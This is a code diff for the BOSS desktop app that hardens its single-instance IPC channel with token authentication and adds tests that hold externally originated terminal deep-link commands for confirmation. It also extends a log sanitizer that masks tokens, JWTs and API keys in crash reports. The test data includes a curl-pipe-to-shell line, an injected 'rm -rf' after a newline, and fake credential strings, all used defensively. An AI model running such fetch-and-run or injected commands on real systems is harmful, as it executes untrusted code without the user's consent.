-                .orElse(false)
-        } catch (e: Exception) {
-            logger.debug(
+        if (response == RESPONSE_OK) {
+            logger.info(LogCategory.SYSTEM, "Existing instance acknowledged URL")
+        } else {
+            logger.warn(
                 LogCategory.SYSTEM,
-                "Process liveness check failed - assuming dead",
-                mapOf("pid" to pid, "error" to e.toString()),
+                "Existing instance did not accept the URL",
+                mapOf("response" to (response ?: "none")),
             )
-            false
         }
+        return response == RESPONSE_OK
+    }
 
     /**
-     * Start listening for URLs from new instances
-     * The callback will be invoked on a background thread
+     * Start listening for URLs from new instances.
      *
-     * Note: This is automatically called by acquireLock() if successful
+     * Note: the channel is already listening once [acquireLock] succeeds; this
+     * exists for API completeness.
      */
     fun startListening(onUrlReceived: (String) -> Unit) {
-        // IPC server is already started by acquireLock()
-        // This method exists for API completeness but doesn't need to do anything
-        logger.debug(LogCategory.SYSTEM, "Already listening for URLs via IPC server")
+        logger.debug(LogCategory.SYSTEM, "Already listening for URLs via the single-instance channel")
     }
 
     /**
-     * Release the lock and stop the IPC server
-     * Should be called on application shutdown
+     * Stop the channel and withdraw the descriptor.
+     * Should be called on application shutdown.
      */
     fun release() {
-        logger.info(LogCategory.SYSTEM, "Releasing single-instance lock...")
+        logger.info(LogCategory.SYSTEM, "Releasing the single-instance channel...")
 
-        // Stop listening
         isListening = false
+        val descriptor = published
+        published = null
 
-        // Close server socket
         try {
-            serverSocket?.close()
-            serverSocket = null
-        } catch (e: Exception) {
-            logger.warn(LogCategory.SYSTEM, "Error closing server socket", error = e)
+            serverChannel?.close()
+        } catch (e: IOException) {
+            logger.warn(LogCategory.SYSTEM, "Error closing the server channel", error = e)
         }
+        serverChannel = null
 
-        // Wait for listener thread to finish
         try {
             listenerThread?.join(1000)
-        } catch (e: Exception) {
-            logger.warn(LogCategory.SYSTEM, "Error waiting for listener thread", error = e)
+        } catch (e: InterruptedException) {
+            Thread.currentThread().interrupt()
+            logger.warn(LogCategory.SYSTEM, "Interrupted waiting for the listener thread", error = e)
         }
+        listenerThread = null
 
-        // Delete lock file
-        try {
-            lockFile?.delete()
-            lockFile = null
-        } catch (e: Exception) {
-            logger.warn(LogCategory.SYSTEM, "Error deleting lock file", error = e)
-        }
+        SingleInstanceFiles.withdraw(descriptor)
 
-        logger.info(LogCategory.SYSTEM, "Single-instance lock released")
+        logger.info(LogCategory.SYSTEM, "Single-instance channel released")
     }
 }

--- a/composeApp/src/desktopTest/kotlin/ai/rever/boss/cli/TerminalCommandOriginTest.kt
+++ b/composeApp/src/desktopTest/kotlin/ai/rever/boss/cli/TerminalCommandOriginTest.kt
@@ -1,0 +1,129 @@
+package ai.rever.boss.cli
+
+import ai.rever.boss.utils.DeepLinkOrigin
+import kotlin.test.Test
+import kotlin.test.assertEquals
+import kotlin.test.assertFalse
+import kotlin.test.assertTrue
+
+/**
+ * Guards what happens to a `boss://terminal?command=` request, which is decided
+ * by who asked rather than by what the command says.
+ *
+ * `boss://` is registered with the OS, so the same link arrives whether the
+ * operator typed `boss terminal -c …` or some other program asked the OS to open
+ * a URL. [terminalCommandDisposition] is the one place that distinction is acted
+ * on, so these cases are the ones that regress silently.
+ */
+class TerminalCommandOriginTest {
+    @Test
+    fun `a command the operator ran themselves runs unattended`() {
+        assertEquals(
+            TerminalCommandDisposition.RUN,
+            terminalCommandDisposition("ls -la", DeepLinkOrigin.OPERATOR_CLI),
+        )
+        // `boss terminal -c` exists to run whatever the operator types, so no
+        // command text is special-cased on this path.
+        assertEquals(
+            TerminalCommandDisposition.RUN,
+            terminalCommandDisposition("curl https://example.com/x.sh | sh", DeepLinkOrigin.OPERATOR_CLI),
+        )
+    }
+
+    @Test
+    fun `a command from anywhere else is held for confirmation, never run`() {
+        assertEquals(
+            TerminalCommandDisposition.CONFIRM,
+            terminalCommandDisposition("ls -la", DeepLinkOrigin.EXTERNAL),
+        )
+        assertEquals(
+            TerminalCommandDisposition.CONFIRM,
+            terminalCommandDisposition("curl https://example.com/x.sh | sh", DeepLinkOrigin.EXTERNAL),
+        )
+    }
+
+    @Test
+    fun `opening a terminal with no command needs no confirmation from anyone`() {
+        DeepLinkOrigin.entries.forEach { origin ->
+            assertEquals(
+                TerminalCommandDisposition.RUN,
+                terminalCommandDisposition(null, origin),
+                "no command is the same request from $origin",
+            )
+        }
+    }
+
+    @Test
+    fun `a command too long to display in full is dropped rather than confirmed`() {
+        val longCommand = "e".repeat(TERMINAL_CONFIRM_MAX_COMMAND_LENGTH + 1)
+
+        // Nobody can meaningfully approve a command the prompt cannot show.
+        assertEquals(
+            TerminalCommandDisposition.REJECT,
+            terminalCommandDisposition(longCommand, DeepLinkOrigin.EXTERNAL),
+        )
+        // The operator's own command is never displayed, so the display bound
+        // does not apply to it.
+        assertEquals(
+            TerminalCommandDisposition.RUN,
+            terminalCommandDisposition(longCommand, DeepLinkOrigin.OPERATOR_CLI),
+        )
+        assertEquals(
+            TerminalCommandDisposition.CONFIRM,
+            terminalCommandDisposition("e".repeat(TERMINAL_CONFIRM_MAX_COMMAND_LENGTH), DeepLinkOrigin.EXTERNAL),
+        )
+    }
+
+    @Test
+    fun `a malformed command is dropped whoever asked`() {
+        DeepLinkOrigin.entries.forEach { origin ->
+            assertEquals(TerminalCommandDisposition.REJECT, terminalCommandDisposition("", origin))
+            assertEquals(TerminalCommandDisposition.REJECT, terminalCommandDisposition("   ", origin))
+            assertEquals(TerminalCommandDisposition.REJECT, terminalCommandDisposition("echo a\nrm -rf x", origin))
+            // A NUL byte, which is what the previous check looked for.
+            assertEquals(
+                TerminalCommandDisposition.REJECT,
+                terminalCommandDisposition("echo a" + Char(0) + "b", origin),
+            )
+        }
+    }
+
+    @Test
+    fun `spaces in a command are ordinary and are not a rejection reason`() {
+        // A shell command is words separated by spaces; treating a space as
+        // malformed would leave `boss terminal -c` able to run only bare words.
+        assertTrue(CLISecurityValidator.isValidCommand("echo a b"))
+        assertEquals(
+            TerminalCommandDisposition.RUN,
+            terminalCommandDisposition("echo a b", DeepLinkOrigin.OPERATOR_CLI),
+        )
+        assertEquals(
+            TerminalCommandDisposition.CONFIRM,
+            terminalCommandDisposition("echo a b", DeepLinkOrigin.EXTERNAL),
+        )
+    }
+
+    @Test
+    fun `command validation accepts one printable line and rejects the rest`() {
+        assertTrue(CLISecurityValidator.isValidCommand("ls -la"))
+        assertTrue(CLISecurityValidator.isValidCommand("git commit -m \"a message\""))
+        assertTrue(CLISecurityValidator.isValidCommand("a".repeat(4096)))
+
+        assertFalse(CLISecurityValidator.isValidCommand("a".repeat(4097)))
+        assertFalse(CLISecurityValidator.isValidCommand(""))
+        // A line break would submit lines the operator was never shown.
+        assertFalse(CLISecurityValidator.isValidCommand("echo hi\r\nwhoami"))
+    }
+
+    @Test
+    fun `a command with no stated origin is treated as external`() {
+        // CLICommand.OpenTerminal defaults its origin, so a caller that forgets
+        // to say gets the cautious handling rather than the operator's.
+        val command = CLICommand.OpenTerminal("ls -la")
+        assertEquals(DeepLinkOrigin.EXTERNAL, command.origin)
+        assertEquals(
+            TerminalCommandDisposition.CONFIRM,
+            terminalCommandDisposition(command.command, command.origin),
+        )
+    }
+}

--- a/composeApp/src/desktopTest/kotlin/ai/rever/boss/utils/SingleInstanceChannelTest.kt
+++ b/composeApp/src/desktopTest/kotlin/ai/rever/boss/utils/SingleInstanceChannelTest.kt
@@ -1,0 +1,307 @@
+package ai.rever.boss.utils
+
+import org.junit.jupiter.api.AfterEach
+import org.junit.jupiter.api.BeforeEach
+import org.junit.jupiter.api.Test
+import org.junit.jupiter.api.io.TempDir
+import java.io.BufferedReader
+import java.io.File
+import java.io.IOException
+import java.io.InputStreamReader
+import java.net.InetAddress
+import java.net.InetSocketAddress
+import java.net.UnixDomainSocketAddress
+import java.nio.channels.Channels
+import java.nio.channels.SocketChannel
+import java.nio.charset.StandardCharsets
+import java.nio.file.Files
+import java.nio.file.Path
+import java.nio.file.attribute.PosixFilePermission
+import kotlin.test.assertEquals
+import kotlin.test.assertFalse
+import kotlin.test.assertNotEquals
+import kotlin.test.assertNotNull
+import kotlin.test.assertNull
+import kotlin.test.assertTrue
+
+/**
+ * Covers the single-instance channel: the descriptor it publishes, the wire
+ * format, and the live behaviour a second launch depends on.
+ *
+ * The channel is what a second launch hands its URL to — including the auth
+ * callback — so the cases here are the ones whose regression would be quiet: a
+ * caller that presents no token being listened to, a descriptor nothing answers
+ * on stopping the app from starting, and a token reaching a log line.
+ */
+class SingleInstanceChannelTest {
+    @TempDir
+    lateinit var tempDir: Path
+
+    @BeforeEach
+    fun useTempRuntimeDir() {
+        SingleInstanceManager.runtimeDirOverride = File(tempDir.toFile(), "run")
+    }
+
+    @AfterEach
+    fun releaseChannel() {
+        SingleInstanceManager.release()
+        SingleInstanceManager.runtimeDirOverride = null
+    }
+
+    // ==================== Descriptor ====================
+
+    @Test
+    fun `a descriptor round-trips through its file format`() {
+        val descriptor =
+            InstanceDescriptor(
+                transport = SingleInstanceTransport.TCP,
+                endpoint = "56789",
+                token = "a".repeat(TOKEN_HEX_LENGTH),
+            )
+        assertEquals(descriptor, parseInstanceDescriptor(descriptor.encode()))
+    }
+
+    @Test
+    fun `a descriptor never renders its token`() {
+        val token = "0123456789abcdef".repeat(4)
+        val rendered = InstanceDescriptor(SingleInstanceTransport.UNIX, "/tmp/x.sock", token).toString()
+        assertFalse(rendered.contains(token), "toString must not carry the token: $rendered")
+        assertTrue(rendered.contains("redacted"))
+    }
+
+    @Test
+    fun `an unusable descriptor is not parsed into one`() {
+        val token = "b".repeat(TOKEN_HEX_LENGTH)
+        assertNull(parseInstanceDescriptor(""))
+        assertNull(parseInstanceDescriptor("version=2\ntransport=TCP\nendpoint=1\ntoken=$token"))
+        assertNull(parseInstanceDescriptor("version=1\ntransport=SMOKE\nendpoint=1\ntoken=$token"))
+        assertNull(parseInstanceDescriptor("version=1\ntransport=TCP\nendpoint=\ntoken=$token"))
+        // A short token would be a guessable one.
+        assertNull(parseInstanceDescriptor("version=1\ntransport=TCP\nendpoint=1\ntoken=short"))
+        assertNull(parseInstanceDescriptor("version=1\ntransport=TCP\nendpoint=1"))
+    }
+
+    // ==================== Wire format ====================
+
+    @Test
+    fun `a request line round-trips, keeping the url whole`() {
+        val token = "c".repeat(TOKEN_HEX_LENGTH)
+        val url = "boss://auth/verify#access_token=abc&type=recovery"
+
+        val open = assertNotNull(parseRequestLine(formatOpenRequest(token, DeepLinkOrigin.EXTERNAL, url)))
+        assertEquals(token, open.token)
+        assertEquals(VERB_OPEN, open.verb)
+        assertEquals(DeepLinkOrigin.EXTERNAL, open.origin)
+        assertEquals(url, open.url)
+
+        val ping = assertNotNull(parseRequestLine(formatPingRequest(token)))
+        assertEquals(VERB_PING, ping.verb)
+        assertNull(ping.url)
+
+        // A URL with a space in it must survive rather than being cut short.
+        val spacedUrl = "boss://url?url=a b"
+        val spaced = assertNotNull(parseRequestLine(formatOpenRequest(token, DeepLinkOrigin.OPERATOR_CLI, spacedUrl)))
+        assertEquals(spacedUrl, spaced.url)
+        assertEquals(DeepLinkOrigin.OPERATOR_CLI, spaced.origin)
+    }
+
+    @Test
+    fun `a malformed or foreign request line is not parsed into one`() {
+        val token = "d".repeat(TOKEN_HEX_LENGTH)
+        assertNull(parseRequestLine(""))
+        assertNull(parseRequestLine("boss://terminal?command=id"))
+        assertNull(parseRequestLine("other-protocol $token $VERB_PING"))
+        assertNull(parseRequestLine("$PROTOCOL_VERSION $token SHUTDOWN"))
+        assertNull(parseRequestLine("$PROTOCOL_VERSION $token $VERB_OPEN"))
+        assertNull(parseRequestLine("$PROTOCOL_VERSION $token $VERB_PING extra"))
+    }
+
+    @Test
+    fun `an unstated or unknown origin on the wire is external`() {
+        assertEquals(DeepLinkOrigin.EXTERNAL, DeepLinkOrigin.fromWireLabel(null))
+        assertEquals(DeepLinkOrigin.EXTERNAL, DeepLinkOrigin.fromWireLabel(""))
+        assertEquals(DeepLinkOrigin.EXTERNAL, DeepLinkOrigin.fromWireLabel("TRUSTED"))
+        assertEquals(DeepLinkOrigin.OPERATOR_CLI, DeepLinkOrigin.fromWireLabel("operator_cli"))
+    }
+
+    // ==================== Live channel ====================
+
+    @Test
+    fun `acquiring publishes an owner-only descriptor and answers on the channel`() {
+        assertTrue(SingleInstanceManager.acquireLock())
+
+        val descriptor = assertNotNull(readPublishedDescriptor())
+        assertEquals(TOKEN_HEX_LENGTH, descriptor.token.length)
+        assertOwnerOnly(descriptorPath())
+        assertOwnerOnly(runtimeDirPath())
+
+        // Where the platform has Unix-domain sockets and the path fits, that is
+        // the transport: no port is published and the filesystem confines the
+        // endpoint. Loopback TCP is the fallback, and the token carries the trust
+        // either way.
+        val socketPath = runtimeDirPath().resolve("single-instance.sock")
+        val fitsUnixPath = socketPath.toString().length <= MAX_UNIX_SOCKET_PATH_LENGTH
+        if (hasPosixPermissions(socketPath) && fitsUnixPath) {
+            assertEquals(SingleInstanceTransport.UNIX, descriptor.transport)
+            assertOwnerOnly(socketPath)
+        }
+
+        // Answering the probe is what "another instance is running" means now.
+        assertTrue(SingleInstanceManager.isAnotherInstanceRunning())
+    }
+
+    @Test
+    fun `a caller presenting the token is acted on, one presenting none is refused`() {
+        assertTrue(SingleInstanceManager.acquireLock())
+        val descriptor = assertNotNull(readPublishedDescriptor())
+
+        assertEquals(RESPONSE_PONG, exchange(descriptor, formatPingRequest(descriptor.token)))
+
+        // Everything a caller without the token might try: a token of its own,
+        // a near-miss of the real one, no protocol at all, and a forward that
+        // claims the operator's own origin.
+        val wrongToken = "e".repeat(TOKEN_HEX_LENGTH)
+        val nearMiss = descriptor.token.dropLast(1) + if (descriptor.token.last() == '0') '1' else '0'
+        assertEquals(RESPONSE_REJECTED, exchange(descriptor, formatPingRequest(wrongToken)))
+        assertEquals(RESPONSE_REJECTED, exchange(descriptor, formatPingRequest(nearMiss)))
+        assertEquals(RESPONSE_REJECTED, exchange(descriptor, "boss://terminal?command=id"))
+        assertEquals(
+            RESPONSE_REJECTED,
+            exchange(descriptor, formatOpenRequest(wrongToken, DeepLinkOrigin.OPERATOR_CLI, "boss://split")),
+        )
+    }
+
+    @Test
+    fun `a caller cannot make the channel buffer without limit`() {
+        assertTrue(SingleInstanceManager.acquireLock())
+        val descriptor = assertNotNull(readPublishedDescriptor())
+
+        // A request well past the read budget. The read gives up rather than
+        // growing, so the request is never acted on — the connection either
+        // comes back refused or is simply dropped.
+        val padding = "a".repeat(20 * 1024)
+        val oversized = formatOpenRequest(descriptor.token, DeepLinkOrigin.EXTERNAL, "boss://url?url=$padding")
+        assertNotEquals(RESPONSE_OK, exchangeTolerantly(descriptor, oversized))
+
+        // The channel is still serving afterwards.
+        assertEquals(RESPONSE_PONG, exchange(descriptor, formatPingRequest(descriptor.token)))
+    }
+
+    @Test
+    fun `a second launch cannot take over and forwards instead`() {
+        assertTrue(SingleInstanceManager.acquireLock())
+        val firstDescriptor = assertNotNull(readPublishedDescriptor())
+
+        // The channel is live, so a second attempt must decline rather than
+        // rebind and orphan the first instance's endpoint.
+        assertFalse(SingleInstanceManager.acquireLock())
+        assertEquals(firstDescriptor, readPublishedDescriptor())
+
+        // Forwarding is the path a second launch takes instead, and the one the
+        // auth callback depends on.
+        assertTrue(SingleInstanceManager.sendToExistingInstance("boss://auth/verify#access_token=abc"))
+        assertFalse(SingleInstanceManager.sendToExistingInstance("  "))
+        assertFalse(SingleInstanceManager.sendToExistingInstance("ftp://example.com"))
+    }
+
+    @Test
+    fun `a descriptor nothing answers on is reclaimed instead of blocking startup`() {
+        // A crashed instance leaves a descriptor behind. It names a live-looking
+        // endpoint, but nothing is listening there.
+        Files.createDirectories(runtimeDirPath())
+        val stale =
+            InstanceDescriptor(
+                transport = SingleInstanceTransport.TCP,
+                endpoint = "56798",
+                token = "9".repeat(TOKEN_HEX_LENGTH),
+            )
+        Files.writeString(descriptorPath(), stale.encode())
+
+        assertFalse(SingleInstanceManager.isAnotherInstanceRunning())
+        assertTrue(SingleInstanceManager.acquireLock(), "a stale descriptor must not stop the app from starting")
+
+        val published = assertNotNull(readPublishedDescriptor())
+        assertNotEquals(stale.token, published.token, "the reclaimed channel must mint its own token")
+    }
+
+    @Test
+    fun `releasing withdraws the descriptor so the next start is clean`() {
+        assertTrue(SingleInstanceManager.acquireLock())
+        assertTrue(Files.exists(descriptorPath()))
+
+        SingleInstanceManager.release()
+
+        assertFalse(Files.exists(descriptorPath()))
+        assertFalse(SingleInstanceManager.isAnotherInstanceRunning())
+        assertTrue(SingleInstanceManager.acquireLock())
+    }
+
+    // ==================== Helpers ====================
+
+    private fun runtimeDirPath(): Path = File(tempDir.toFile(), "run").toPath()
+
+    private fun descriptorPath(): Path = runtimeDirPath().resolve("single-instance")
+
+    private fun readPublishedDescriptor(): InstanceDescriptor? =
+        if (Files.exists(descriptorPath())) parseInstanceDescriptor(Files.readString(descriptorPath())) else null
+
+    /**
+     * Sends one raw line to the published endpoint and reads the reply, the way
+     * any other local program would have to.
+     */
+    private fun exchange(
+        descriptor: InstanceDescriptor,
+        line: String,
+    ): String? {
+        val address =
+            when (descriptor.transport) {
+                SingleInstanceTransport.UNIX -> {
+                    UnixDomainSocketAddress.of(descriptor.endpoint)
+                }
+
+                SingleInstanceTransport.TCP -> {
+                    InetSocketAddress(InetAddress.getLoopbackAddress(), descriptor.endpoint.toInt())
+                }
+            }
+        return SocketChannel.open(address).use { channel ->
+            val output = Channels.newOutputStream(channel)
+            output.write("$line\n".toByteArray(StandardCharsets.UTF_8))
+            output.flush()
+            BufferedReader(InputStreamReader(Channels.newInputStream(channel), StandardCharsets.UTF_8)).readLine()
+        }
+    }
+
+    /**
+     * Like [exchange], but describes a dropped connection instead of throwing: an
+     * over-budget request may be answered with a refusal or simply cut off, and
+     * either way it must not be acknowledged.
+     */
+    private fun exchangeTolerantly(
+        descriptor: InstanceDescriptor,
+        line: String,
+    ): String? =
+        try {
+            exchange(descriptor, line)
+        } catch (e: IOException) {
+            "connection dropped: ${e.message}"
+        }
+
+    /**
+     * Asserts nobody but the owner can reach [path]. Skipped where the filesystem
+     * has no POSIX view (Windows), which relies on the profile directory's ACL.
+     */
+    private fun assertOwnerOnly(path: Path) {
+        if (!hasPosixPermissions(path)) return
+
+        val ownerOnly =
+            setOf(
+                PosixFilePermission.OWNER_READ,
+                PosixFilePermission.OWNER_WRITE,
+                PosixFilePermission.OWNER_EXECUTE,
+            )
+        val forOthers = Files.getPosixFilePermissions(path) - ownerOnly
+        assertTrue(forOthers.isEmpty(), "$path grants $forOthers beyond its owner")
+    }
+
+    private fun hasPosixPermissions(path: Path) = path.fileSystem.supportedFileAttributeViews().contains("posix")
+}

--- a/composeApp/src/desktopTest/kotlin/ai/rever/boss/utils/logging/LogSanitizerTest.kt
+++ b/composeApp/src/desktopTest/kotlin/ai/rever/boss/utils/logging/LogSanitizerTest.kt
@@ -183,6 +183,15 @@ class LogSanitizerTest {
     }
 
     @Test
+    fun `looksLikeSecret detects the remaining GitHub token prefixes`() {
+        // ghs_ (server-to-server) and github_pat_ (fine-grained) round out the
+        // ghp_/gho_ pair above. Both are short enough here that the length rule
+        // does not reach them, so this pins the structural rule specifically.
+        assertTrue(LogSanitizer.looksLikeSecret("ghs_0123456789ab"))
+        assertTrue(LogSanitizer.looksLikeSecret("github_pat_01234567"))
+    }
+
+    @Test
     fun `looksLikeSecret returns false for short strings`() {
         assertFalse(LogSanitizer.looksLikeSecret("hello"))
         assertFalse(LogSanitizer.looksLikeSecret("abc123"))
@@ -245,6 +254,15 @@ class LogSanitizerTest {
 
         // Should be masked because it looks like a JWT
         assertTrue((result["data"] as String).contains("..."))
+    }
+
+    @Test
+    fun `sanitizeMap masks a short value with a credential shape`() {
+        // Under an unremarkable key, so the key list does not decide it, and
+        // short enough that the length rule does not either.
+        val result = LogSanitizer.sanitizeMap(mapOf("detail" to "ghs_0123456789ab"))
+
+        assertEquals("ghs...9ab", result["detail"])
     }
 
     @Test
@@ -349,5 +367,187 @@ class LogSanitizerTest {
     @Test
     fun `describeUri handles null`() {
         assertEquals("[empty]", LogSanitizer.describeUri(null))
+    }
+
+    // =========================================================================
+    // sanitizeExceptionMessage Tests
+    //
+    // These messages travel: CrashHandler puts them into a crash report, and a
+    // crash report is filed where anyone can read it. So the bar is two-sided —
+    // no credential survives, and everything that makes the message diagnosable
+    // does.
+    // =========================================================================
+
+    @Test
+    fun `sanitizeExceptionMessage masks a bare GitHub token`() {
+        val result = LogSanitizer.sanitizeExceptionMessage("token=ghp_AbCdEfGhIjKlMnOpQrStUvWxYz012345 rejected")
+
+        assertEquals("token=ghp...345 rejected", result)
+    }
+
+    @Test
+    fun `sanitizeExceptionMessage masks a JWT under a config key`() {
+        val result =
+            LogSanitizer.sanitizeExceptionMessage(
+                "SUPABASE_ANON_KEY=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.body.sig invalid",
+            )
+
+        assertEquals("SUPABASE_ANON_KEY=eyJ...sig invalid", result)
+    }
+
+    @Test
+    fun `sanitizeExceptionMessage masks a JWT written in prose`() {
+        // No name=value pair and no URL around it, so only the structural rule
+        // can catch this one.
+        val jwt = "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozjgNryP4J3jVmNHl0w5N_XgL0n3I9PlFUP0THsR8U"
+
+        val result = LogSanitizer.sanitizeExceptionMessage("Bearer $jwt was refused")
+
+        assertEquals("Bearer eyJ...R8U was refused", result)
+    }
+
+    @Test
+    fun `sanitizeExceptionMessage masks fine-grained and server GitHub tokens`() {
+        assertEquals(
+            "GITHUB_TOKEN=git...NOP rejected",
+            LogSanitizer.sanitizeExceptionMessage("GITHUB_TOKEN=github_pat_11ABCDEFG0abcdefghijKLMNOP rejected"),
+        )
+        assertEquals(
+            "credential ghs...hij was refused",
+            LogSanitizer.sanitizeExceptionMessage("credential ghs_0123456789abcdefghij was refused"),
+        )
+    }
+
+    @Test
+    fun `sanitizeExceptionMessage masks a hyphenated vendor key`() {
+        val result =
+            LogSanitizer.sanitizeExceptionMessage("OPENAI_API_KEY=sk-proj-AbCdEfGhIjKlMnOpQrStUvWx not accepted")
+
+        assertEquals("OPENAI_API_KEY=sk-...vWx not accepted", result)
+    }
+
+    @Test
+    fun `sanitizeExceptionMessage masks a camelCase assignment`() {
+        val result = LogSanitizer.sanitizeExceptionMessage("accessToken=abcdefghijklmnopqrst expired")
+
+        assertEquals("accessToken=abc...rst expired", result)
+    }
+
+    @Test
+    fun `sanitizeExceptionMessage keeps a token carried in a URL redacted`() {
+        // The path rule runs first and its `(?:/[^\s:]+)+` swallows everything
+        // after the scheme's colon, which is what removes a token from a query
+        // string or a fragment. Pinned here because the later passes must not
+        // disturb that ordering.
+        assertEquals(
+            "Request to https:[PATH] failed",
+            LogSanitizer.sanitizeExceptionMessage(
+                "Request to https://api.example.com/auth/v1/verify?access_token=eyJhbGciOiJIUzI1NiJ9.abc.def failed",
+            ),
+        )
+        assertEquals(
+            "Deep link boss:[PATH] rejected",
+            LogSanitizer.sanitizeExceptionMessage(
+                "Deep link boss://auth/verify#access_token=eyJhbGciOiJIUzI1NiJ9.abc.def&type=magiclink rejected",
+            ),
+        )
+    }
+
+    @Test
+    fun `sanitizeExceptionMessage preserves an ordinary long identifier`() {
+        // Well over the 20-character length that marks a map *value* as
+        // sensitive. In message text a long run is normally just a name, and
+        // masking it would cost the only clue the message carries.
+        val message = "Unresolved dependency applicationPreferencesRepositoryFactory for task_manager_configuration"
+
+        assertEquals(message, LogSanitizer.sanitizeExceptionMessage(message))
+    }
+
+    @Test
+    fun `sanitizeExceptionMessage preserves config pairs that name no secret`() {
+        val message = "KEYBOARD_LAYOUT=us and LOG_LEVEL=DEBUG and BOSS_WINDOW_MODE=maximized"
+
+        assertEquals(message, LogSanitizer.sanitizeExceptionMessage(message))
+    }
+
+    @Test
+    fun `sanitizeExceptionMessage preserves a null value under a sensitive name`() {
+        // "token=null" is the whole diagnosis; "token=***" throws it away.
+        val message = "session token=null while refreshing"
+
+        assertEquals(message, LogSanitizer.sanitizeExceptionMessage(message))
+    }
+
+    @Test
+    fun `sanitizeExceptionMessage keeps masking paths and emails`() {
+        assertEquals(
+            "Could not read [PATH] for [EMAIL]",
+            LogSanitizer.sanitizeExceptionMessage(
+                "Could not read /Users/someone/.boss/config.json for someone@example.com",
+            ),
+        )
+    }
+
+    @Test
+    fun `sanitizeExceptionMessage handles null and blank`() {
+        assertEquals("[no message]", LogSanitizer.sanitizeExceptionMessage(null))
+        assertEquals("[no message]", LogSanitizer.sanitizeExceptionMessage(""))
+    }
+
+    // =========================================================================
+    // sanitizeStackTrace Tests
+    // =========================================================================
+
+    @Test
+    fun `sanitizeStackTrace leaves a realistic Kotlin trace intact`() {
+        val trace =
+            listOf(
+                "java.lang.IllegalStateException: Plugin registry was not initialized",
+                "\tat ai.rever.boss.plugin.loader.DynamicPluginLoader.loadPlugin(DynamicPluginLoader.kt:214)",
+                "\tat ai.rever.boss.plugin.repository.PluginRepositoryCoordinator\$installFromStore\$2" +
+                    ".invokeSuspend(PluginRepositoryCoordinator.kt:487)",
+                "\tat kotlinx.coroutines.internal.ScopeCoroutine.afterResume(Scopes.kt:33)",
+                "\tat kotlinx.coroutines.scheduling.CoroutineScheduler\$Worker.executeTask(CoroutineScheduler.kt:806)",
+                "\tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)",
+                "Caused by: java.lang.NullPointerException: activeWorkspaceConfigurationProvider was null",
+            ).joinToString("\n")
+
+        assertEquals(trace, LogSanitizer.sanitizeStackTrace(trace))
+    }
+
+    @Test
+    fun `sanitizeStackTrace masks a credential quoted into a Caused by line`() {
+        val trace =
+            listOf(
+                "java.lang.IllegalArgumentException: bad config",
+                "\tat ai.rever.boss.services.auth.SessionManager.refreshSession(SessionManager.kt:142)",
+                "Caused by: java.io.IOException: " +
+                    "SUPABASE_ANON_KEY=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.body.sig invalid",
+            ).joinToString("\n")
+
+        val result = LogSanitizer.sanitizeStackTrace(trace)
+
+        assertTrue(result.contains("SUPABASE_ANON_KEY=eyJ...sig invalid"))
+        // The frame either side of it is untouched.
+        assertTrue(result.contains("ai.rever.boss.services.auth.SessionManager.refreshSession(SessionManager.kt:142)"))
+        assertFalse(result.contains("IkpXVCJ9"))
+    }
+
+    @Test
+    fun `sanitizeStackTrace treats a JDK module prefix as a path`() {
+        // Pre-existing behaviour of the path rule, unrelated to credential
+        // masking: the `/` in a module-qualified frame starts a path match, so
+        // the frame reads as `java.base[PATH]`. Recorded so the effect is known
+        // rather than discovered, and so a future change to the path rule shows
+        // up here.
+        val frame = "\tat java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)"
+
+        assertEquals("\tat java.base[PATH]:1136)", LogSanitizer.sanitizeStackTrace(frame))
+    }
+
+    @Test
+    fun `sanitizeStackTrace handles null and blank`() {
+        assertEquals("[no stack trace]", LogSanitizer.sanitizeStackTrace(null))
+        assertEquals("[no stack trace]", LogSanitizer.sanitizeStackTrace(""))
     }
 }

--- a/docs/SUBSYSTEMS.md
+++ b/docs/SUBSYSTEMS.md
@@ -180,6 +180,10 @@ CoroutineScope(Dispatchers.IO).launch {
 4. If boss://: processes as authentication deep link
 5. Creates new browser tab in active window
 
+Anything arriving this way is tagged `DeepLinkOrigin.EXTERNAL`, since the OS
+accepts a URL from any program; only links BOSS's own CLI parsed out of `argv`
+are tagged `OPERATOR_CLI`. See the Deep Links section of `AGENTS.md`.
+
 ## Runner Terminal System
 
 **Overview**: Run configurations execute in terminal with run/stop/re-run controls (Issue #347).

--- a/plugin-platform/plugin-logging/src/desktopMain/kotlin/ai/rever/boss/plugin/logging/LogSanitizer.kt
+++ b/plugin-platform/plugin-logging/src/desktopMain/kotlin/ai/rever/boss/plugin/logging/LogSanitizer.kt
@@ -218,55 +218,183 @@ object LogSanitizer {
         }
     }
 
+    // -------------------------------------------------------------------------
+    // Patterns and vocabularies for sanitization.
+    //
+    // All compiled/allocated once: every log line and every crash report is put
+    // through them, so none of this may be rebuilt per call.
+    // -------------------------------------------------------------------------
+
+    private val filePathPattern = Regex("""(?:/[^\s:]+)+|(?:[A-Za-z]:\\[^\s:]+)+""")
+    private val urlPattern = Regex("""https?://[^\s]+""")
+    private val emailPattern = Regex("""[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}""")
+
+    /**
+     * Runs of text that are a credential by their own structure, wherever they
+     * appear: a JWT (three base64url segments — the first is the base64url of a
+     * JSON header, which is why every JWT begins `eyJ`), a GitHub token prefix,
+     * or a vendor `sk_`/`pk_` key prefix.
+     *
+     * Each alternative is anchored on the left by a boundary that rules out word
+     * characters and `.`, so a name that merely *contains* one of these prefixes
+     * keeps its text: `task_manager_configuration` is not a Stripe key, and
+     * neither is `com.example.pk_utilities`. That precision is what makes the
+     * pattern safe to run over message text and stack traces, which consist
+     * mostly of long class and method names.
+     */
+    private val credentialShapePattern =
+        Regex(
+            "(?<![A-Za-z0-9_.])(?:" +
+                """eyJ[A-Za-z0-9_-]{4,}\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*""" +
+                "|(?:gh[pousr]_|github_pat_)[A-Za-z0-9_]{8,}" +
+                "|(?:sk|pk)[-_][A-Za-z0-9_-]{8,}" +
+                ")",
+        )
+
+    /**
+     * A `name=value` pair inside a message — the shape a quoted config line,
+     * environment entry or command line arrives in. Group 1 is the name, group 2
+     * the value.
+     *
+     * Only the value is ever masked. The name is what makes a report actionable
+     * (it says *which* setting was wrong) and is not itself the secret.
+     *
+     * A value whose first character is `[` is excluded, so a value an earlier
